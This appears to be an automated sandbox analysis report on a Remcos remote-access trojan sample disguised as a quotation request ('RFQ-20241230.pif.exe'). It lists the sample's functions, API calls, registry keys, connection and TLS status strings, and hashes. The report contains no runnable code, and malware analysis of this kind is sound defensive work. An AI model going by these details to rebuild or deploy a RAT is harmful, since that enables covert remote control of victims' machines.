40e00d-40e017 CreateThread 390->395 391->390 398 40e022-40e025 394->398 399 40e033-40e038 394->399 395->394 401 40e073-40e08e call 401e8f call 41246e 398->401 402 40e027-40e031 398->402 404 40e03d-40e06e call 401f66 call 404c9e call 401f66 call 41a696 call 401eea 399->404 413 40e094-40e0d4 call 41ae18 call 401e07 call 412584 call 401e13 call 401e07 401->413 414 40e12a-40e12f call 40cbac call 413fd4 401->414 402->404 404->401 433 40e0ed-40e0f2 DeleteFileW 413->433 414->101 434 40e0f4-40e125 call 41ae18 call 401e07 call 41297a call 401e13 * 2 433->434 435 40e0d6-40e0d9 433->435 434->414 435->434 436 40e0db-40e0e8 Sleep call 401e07 435->436 436->433
                            APIs
                              • Part of subcall function 0041BCF3: LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD08
                              • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD11
                              • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD28
                              • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD2B
                              • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD3D
                              • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD40
                              • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD51
                              • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD54
                              • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD65
                              • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD68
                              • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD75
                              • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD78
                              • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD85
                              • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD88
                              • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD95
                              • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD98
                              • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BDA9
                              • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
                              • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDB9
                              • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BDBC
                              • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDCD
                              • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BDD0
                              • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDE1
                              • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BDE4
                              • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDF5
                              • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
                              • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BE05
                              • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BE08
                              • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE16
                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\RFQ-20241230.pif.exe,00000104), ref: 0040D790
                              • Part of subcall function 0040FCBA: __EH_prolog.LIBCMT ref: 0040FCBF
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                            • String ID: (CG$(CG$0DG$@CG$@CG$Access Level: $Administrator$C:\Users\user\Desktop\RFQ-20241230.pif.exe$Exe$Inj$Remcos Agent initialized$Software\$User$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$`=G$dCG$del$del$exepath$licence$license_code.txt$BG$BG$BG$BG$BG
                            • API String ID: 2830904901-113623222
                            • Opcode ID: ec2fbce8c8fdecfb6bd1c00b52c4f5e2366ed6cef1538e238a09c4e97fe47ccc
                            • Instruction ID: 3e021a1a4b13f59cbd2257f1e4af8b1458c06fff599f70b9144805750af3581d
                            • Opcode Fuzzy Hash: ec2fbce8c8fdecfb6bd1c00b52c4f5e2366ed6cef1538e238a09c4e97fe47ccc
                            • Instruction Fuzzy Hash: 31329260B043406ADA18B776DC57BBE269A8FC1748F04443FB8467B2E2DE7C9D45839E
                            Function 00413FD4 Relevance: 48.1, APIs: 5, Strings: 22, Instructions: 813sleepnetworkCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 447 413fd4-41401f call 401faa call 41aa83 call 401faa call 401d64 call 401e8f call 43a5f7 460 414021-414028 Sleep 447->460 461 41402e-41407c call 401f66 call 401d64 call 401fbd call 41afd3 call 404262 call 401d64 call 40b125 447->461 460->461 476 4140f0-41418a call 401f66 call 401d64 call 401fbd call 41afd3 call 401d64 * 2 call 4085b4 call 4027cb call 401eef call 401eea * 2 call 401d64 call 405422 461->476 477 41407e-4140ed call 401d64 call 4022f8 call 401d64 call 401e8f call 401d64 call 4022f8 call 401d64 call 401e8f call 401d64 call 4022f8 call 401d64 call 401e8f call 404101 461->477 530 41419a-4141a1 476->530 531 41418c-414198 476->531 477->476 532 4141a6-414242 call 40541d call 404cbf call 405ce6 call 4027cb call 401f66 call 41a696 call 401eea * 2 call 401d64 call 401e8f call 401d64 call 401e8f call 413f9a 530->532 531->532 559 414244-41428a WSAGetLastError call 41bc86 call 404c9e call 401f66 call 41a696 call 401eea 532->559 560 41428f-41429d call 4041f1 532->560 583 414b54-414b66 call 4047eb call 4020b4 559->583 566 4142ca-4142d8 call 404915 call 40428c 560->566 567 41429f-4142c5 call 401f66 * 2 call 41a696 560->567 579 4142dd-4142df 566->579 567->583 582 4142e5-414432 call 401d64 * 2 call 404cbf call 405ce6 call 4027cb call 405ce6 call 4027cb call 401f66 call 41a696 call 401eea * 4 call 41a97d call 413683 call 4082dc call 440c61 call 401d64 call 401fbd call 4022f8 call 401e8f * 2 call 41265d 579->582 579->583 647 414434-414441 call 40541d 582->647 648 414446-41446d call 401e8f call 412513 582->648 596 414b68-414b88 call 401d64 call 401e8f call 43a5f7 Sleep 583->596 597 414b8e-414b96 call 401d8c 583->597 596->597 597->476 647->648 654 414474-414ac7 call 403b40 call 40cbf1 call 41adfe call 41aed8 call 41ad56 call 401d64 GetTickCount call 41ad56 call 41acb0 call 41ad56 * 2 call 41ac62 call 41aed8 * 5 call 40e679 call 41aed8 call 4027ec call 40275c call 4027cb call 40275c call 4027cb * 3 call 40275c call 4027cb call 405ce6 call 4027cb call 405ce6 call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 405ce6 call 4027cb * 5 call 40275c call 4027cb call 40275c call 4027cb * 7 call 40275c call 404468 call 401eea * 50 call 401e13 call 401eea * 6 call 401e13 call 4045d5 648->654 655 41446f-414471 648->655 901 414ac9-414ad0 654->901 902 414adb-414ae2 654->902 655->654 901->902 903 414ad2-414ad4 901->903 904 414ae4-414ae9 call 40a767 902->904 905 414aee-414b20 call 405415 call 401f66 * 2 call 41a696 902->905 903->902 904->905 916 414b22-414b2e CreateThread 905->916 917 414b34-414b4f call 401eea * 2 call 401e13 905->917 916->917 917->583
                            APIs
                            • Sleep.KERNEL32(00000000,00000029,004742F8,?,00000000), ref: 00414028
                            • WSAGetLastError.WS2_32 ref: 00414249
                            • Sleep.KERNELBASE(00000000,00000002), ref: 00414B88
                              • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: Sleep$ErrorLastLocalTime
                            • String ID: | $%I64u$5.3.0 Pro$@CG$C:\Users\user\Desktop\RFQ-20241230.pif.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$TLS Off$TLS On $XCG$XCG$XCG$`=G$dCG$hlight$name$>G$>G$BG
                            • API String ID: 524882891-2491136596
                            • Opcode ID: 572c934186da3d0baa6f804f271fc78f46c3b558fbe77c50dea129d850f64105
                            • Instruction ID: 1c0fcd5d2769b0c1ed3f5537d8c306574ebe830810c6f13c8178cbf41d879861
                            • Opcode Fuzzy Hash: 572c934186da3d0baa6f804f271fc78f46c3b558fbe77c50dea129d850f64105
                            • Instruction Fuzzy Hash: 3B525E31A001145ADB18F771DDA6AEE73A59F90708F1041BFB80A771E2EF385E85CA9D
                            Function 0040428C Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 147networkCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • connect.WS2_32(?,?,?), ref: 004042A5
                            • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043CB
                            • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043D5
                            • WSAGetLastError.WS2_32(?,?,?,0040192B), ref: 004043E7
                              • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateEvent$ErrorLastLocalTimeconnect
                            • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                            • API String ID: 994465650-2151626615
                            • Opcode ID: 2601ad7ba584dd83cc4b687a7b2e5622e4b8e2ffaa9cdc4205b416171ec1cd63
                            • Instruction ID: feeaa4dc0a5480c3be004408dd81f6e2390fe6c9429734df96c13844dfc6b1ca
                            • Opcode Fuzzy Hash: 2601ad7ba584dd83cc4b687a7b2e5622e4b8e2ffaa9cdc4205b416171ec1cd63
                            • Instruction Fuzzy Hash: 3E4116B1B002026BCB04B77A8C4B66E7A55AB81354B40016FE901676D3FE79AD6087DF
                            Function 004047EB Relevance: 18.1, APIs: 12, Instructions: 66synchronizationCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 004047FD
                            • SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404808
                            • CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404811
                            • closesocket.WS2_32(000000FF), ref: 0040481F
                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404856
                            • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404867
                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040486E
                            • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404880
                            • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404885
                            • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040488A
                            • SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404895
                            • CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 0040489A
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                            • String ID:
                            • API String ID: 3658366068-0
                            • Opcode ID: 7b4c4e1fc9e1a33e746d3ea038c7d733e0ecce283ed42e9dfa2e2b523637497c
                            • Instruction ID: 6857b948c75ecf5e4d11b49f17ebd09eceef1c2fbc6fc14a1e153603fddcf20a
                            • Opcode Fuzzy Hash: 7b4c4e1fc9e1a33e746d3ea038c7d733e0ecce283ed42e9dfa2e2b523637497c
                            • Instruction Fuzzy Hash: 7A212C71144B149FDB216B26EC45A27BBE1EF40325F104A7EF2E212AF1CB76E851DB48
                            Function 0040C89E Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1016 40c89e-40c8c3 call 401e52 1019 40c8c9 1016->1019 1020 40c9ed-40ca13 call 401e07 GetLongPathNameW call 403b40 1016->1020 1021 40c8d0-40c8d5 1019->1021 1022 40c9c2-40c9c7 1019->1022 1023 40c905-40c90a 1019->1023 1024 40c9d8 1019->1024 1025 40c9c9-40c9ce call 43ac1f 1019->1025 1026 40c8da-40c8e8 call 41a75b call 401e18 1019->1026 1027 40c8fb-40c900 1019->1027 1028 40c9bb-40c9c0 1019->1028 1029 40c90f-40c916 call 41b16b 1019->1029 1041 40ca18-40ca85 call 403b40 call 40cc37 call 402860 * 2 call 401e13 * 5 1020->1041 1031 40c9dd-40c9e2 call 43ac1f 1021->1031 1022->1031 1023->1031 1024->1031 1037 40c9d3-40c9d6 1025->1037 1050 40c8ed 1026->1050 1027->1031 1028->1031 1042 40c918-40c968 call 403b40 call 43ac1f call 403b40 call 402860 call 401e18 call 401e13 * 2 1029->1042 1043 40c96a-40c9b6 call 403b40 call 43ac1f call 403b40 call 402860 call 401e18 call 401e13 * 2 1029->1043 1044 40c9e3-40c9e8 call 4082d7 1031->1044 1037->1024 1037->1044 1055 40c8f1-40c8f6 call 401e13 1042->1055 1043->1050 1044->1020 1050->1055 1055->1020
                            APIs
                            • GetLongPathNameW.KERNELBASE(00000000,?,00000208), ref: 0040CA04
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: LongNamePath
                            • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                            • API String ID: 82841172-425784914
                            • Opcode ID: e65b7fd2f28b979a12418c5f5c2e2d29b720dc4ff9d72dd2f9df27909d96306d
                            • Instruction ID: a37aa742da7f535015bd00beacd4484d13b2c9c5bc690283ee024c69455bfc47
                            • Opcode Fuzzy Hash: e65b7fd2f28b979a12418c5f5c2e2d29b720dc4ff9d72dd2f9df27909d96306d
                            • Instruction Fuzzy Hash: 68413A721442009AC214F721DD97DAFB7A4AE90759F10063FB546720E2FE7CAA49C69F
                            Function 0041A473 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 59COMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                              • Part of subcall function 0041B16B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B17C
                              • Part of subcall function 00412513: RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 00412537
                              • Part of subcall function 00412513: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00412554
                              • Part of subcall function 00412513: RegCloseKey.KERNELBASE(?), ref: 0041255F
                            • StrToIntA.SHLWAPI(00000000,0046BC48,?,00000000,00000000,00474358,00000003,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0041A4E9
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseCurrentOpenProcessQueryValue
                            • String ID: (32 bit)$ (64 bit)$0JG$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                            • API String ID: 1866151309-3211212173
                            • Opcode ID: 9cf1f296616cdcd313259411c277503da338ecbad0565973079cd90fb6de65e1
                            • Instruction ID: ceb3f8158c83cee62a9ab3acf094014ca2543c25b31c887bfc35cbf025930a6e
                            • Opcode Fuzzy Hash: 9cf1f296616cdcd313259411c277503da338ecbad0565973079cd90fb6de65e1
                            • Instruction Fuzzy Hash: F611CAA050020566C704B765DC9BDBF765ADB90304F40453FB506E31D2EB6C8E8583EE
                            Function 004126D2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 37registryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1169 4126d2-4126e9 RegCreateKeyA 1170 412722 1169->1170 1171 4126eb-412720 call 4022f8 call 401e8f RegSetValueExA RegCloseKey 1169->1171 1173 412724-412730 call 401eea 1170->1173 1171->1173
                            APIs
                            • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004126E1
                            • RegSetValueExA.KERNELBASE(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709
                            • RegCloseKey.KERNELBASE(?,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412714
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseCreateValue
                            • String ID: HgF$pth_unenc
                            • API String ID: 1818849710-3662775637
                            • Opcode ID: 5060bd4906adf847476d1d6d5221a1eec7a3f5928a954e173dbc633271fad0d2
                            • Instruction ID: d7c223529d0a909ac1d5b5cf1be9cbd74eb10d05c00374dbcf2eb8abb0eb8976
                            • Opcode Fuzzy Hash: 5060bd4906adf847476d1d6d5221a1eec7a3f5928a954e173dbc633271fad0d2
                            • Instruction Fuzzy Hash: 98F09032040104FBCB019FA0ED55EEF37ACEF04751F108139FD06A61A1EA75DE04EA94
                            Function 004127D5 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31registryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1196 4127d5-4127eb RegCreateKeyA 1197 412818-41281b 1196->1197 1198 4127ed-412812 RegSetValueExA RegCloseKey 1196->1198 1198->1197 1199 412814-412817 1198->1199
                            APIs
                            • RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                            • RegSetValueExA.KERNELBASE(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                            • RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseCreateValue
                            • String ID: TUF
                            • API String ID: 1818849710-3431404234
                            • Opcode ID: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                            • Instruction ID: 4d8f19d4f5fba69279ea975c705bdc3302fb28fe13ea63ccb444db4f968143a5
                            • Opcode Fuzzy Hash: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                            • Instruction Fuzzy Hash: 8DE03071540204BFEF115B909C05FDB3BA8EB05B95F004161FA05F6191D271CE14D7A4
                            Function 0040BED7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1200 40bed7-40bf03 call 401e8f CreateMutexA GetLastError
                            APIs
                            • CreateMutexA.KERNELBASE(00000000,00000001,00000000,0040D9AA,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0040BEE6
                            • GetLastError.KERNEL32 ref: 0040BEF1
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateErrorLastMutex
                            • String ID: (CG
                            • API String ID: 1925916568-4210230975
                            • Opcode ID: 68001a27d0a1b5aca9f7806f756c118c8604acbb3141160e9eafa025ff823f9e
                            • Instruction ID: f970ec9d0541ab61c93bafde2a4f59c5c821b48a7874ab2150ad5935bc14b509
                            • Opcode Fuzzy Hash: 68001a27d0a1b5aca9f7806f756c118c8604acbb3141160e9eafa025ff823f9e
                            • Instruction Fuzzy Hash: 75D012707083009BD7181774BC8A77D3555E784703F00417AB90FD55E1CB6888409919
                            Function 00412513 Relevance: 4.5, APIs: 3, Instructions: 42registryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1203 412513-41253f RegOpenKeyExA 1204 412541-412567 RegQueryValueExA RegCloseKey 1203->1204 1205 412572 1203->1205 1204->1205 1206 412569-412570 1204->1206 1207 412577-412583 call 401f66 1205->1207 1206->1207
                            APIs
                            • RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 00412537
                            • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00412554
                            • RegCloseKey.KERNELBASE(?), ref: 0041255F
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseOpenQueryValue
                            • String ID:
                            • API String ID: 3677997916-0
                            • Opcode ID: fb0399a994eaa7e17bc6b867fc74c46ca573e9fca6dfde94924c7a451072e484
                            • Instruction ID: 155fce86b91483c744b9f02885d56de91ccd1cdd8f33956e2d71fd22bd1c87ae
                            • Opcode Fuzzy Hash: fb0399a994eaa7e17bc6b867fc74c46ca573e9fca6dfde94924c7a451072e484
                            • Instruction Fuzzy Hash: F0F08176900118BBCB209BA1ED48DEF7FBDEB44751F004066BA06E2150D6749E55DBA8
                            Function 004124B7 Relevance: 4.5, APIs: 3, Instructions: 38registryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1210 4124b7-4124df RegOpenKeyExA 1211 4124e1-412509 RegQueryValueExA RegCloseKey 1210->1211 1212 41250f-412512 1210->1212 1211->1212 1213 41250b-41250e 1211->1213
                            APIs
                            • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 004124D7
                            • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                            • RegCloseKey.KERNELBASE(?), ref: 00412500
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseOpenQueryValue
                            • String ID:
                            • API String ID: 3677997916-0
                            • Opcode ID: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
                            • Instruction ID: 3c8b5742b91bab9b7a0bfd6479237677f271592d1db5ef4b45a1d16c6b8d7bbd
                            • Opcode Fuzzy Hash: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
                            • Instruction Fuzzy Hash: C0F03A76900208BFDF119FA0AC45FDF7BB9EB04B55F1040A1FA05F6291D670DA54EB98
                            Function 0044E1CE Relevance: 4.5, APIs: 3, Instructions: 37COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1214 44e1ce-44e1dc GetEnvironmentStringsW 1215 44e1e2-44e1f1 call 44e114 call 446b0f 1214->1215 1216 44e1de-44e1e0 1214->1216 1221 44e1f6-44e1fc 1215->1221 1217 44e219-44e21d 1216->1217 1222 44e1fe-44e206 call 435ae0 1221->1222 1223 44e209-44e218 call 446ad5 FreeEnvironmentStringsW 1221->1223 1222->1223 1223->1217
                            APIs
                            • GetEnvironmentStringsW.KERNEL32 ref: 0044E1D2
                            • _free.LIBCMT ref: 0044E20B
                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044E212
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: EnvironmentStrings$Free_free
                            • String ID:
                            • API String ID: 2716640707-0
                            • Opcode ID: b18c947654e7b0546aa6222021d2cd9bdeba9737cdf1a969c3be5f4868f739c1
                            • Instruction ID: 604b519dfe4379e15ef5464dbc843faceff6e13584e6925da33daec4a3bd613e
                            • Opcode Fuzzy Hash: b18c947654e7b0546aa6222021d2cd9bdeba9737cdf1a969c3be5f4868f739c1
                            • Instruction Fuzzy Hash: A7E0E53714492026F211722B7C4AD6B2A1DEFC27B6B26002AF40492243EE298D0240FA
                            Function 0041246E Relevance: 4.5, APIs: 3, Instructions: 32registryCOMMON
                            Download Yara Rule
                            APIs
                            • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?,00000000,?,?,0040B996,004660E0), ref: 00412485
                            • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,00000000,?,?,0040B996,004660E0), ref: 00412499
                            • RegCloseKey.KERNELBASE(?,?,?,0040B996,004660E0), ref: 004124A4
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseOpenQueryValue
                            • String ID:
                            • API String ID: 3677997916-0
                            • Opcode ID: e297991b72ec1606279c96c89a25a7ac8737aea41b7b6b8683e2e1c686c69e22
                            • Instruction ID: 2a31b93e49ffe9e6f23ef690bd11c8afd6de107f9352384350bf23698ee7218d
                            • Opcode Fuzzy Hash: e297991b72ec1606279c96c89a25a7ac8737aea41b7b6b8683e2e1c686c69e22
                            • Instruction Fuzzy Hash: 46E06531405234BBDF314BA2AD0DDDB7FACEF16BA17004061BC09A2251D2658E50E6E8
                            Function 00409517 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: _wcslen
                            • String ID: xAG
                            • API String ID: 176396367-2759412365
                            • Opcode ID: 67b639f6f502bf991f83ab0ee8fabe8b44a35461e942d099586b23cecd669b62
                            • Instruction ID: 06a27fc39790a6443aa461e0e984232ee7603be4cd8470566e0b89af9a4a2a71
                            • Opcode Fuzzy Hash: 67b639f6f502bf991f83ab0ee8fabe8b44a35461e942d099586b23cecd669b62
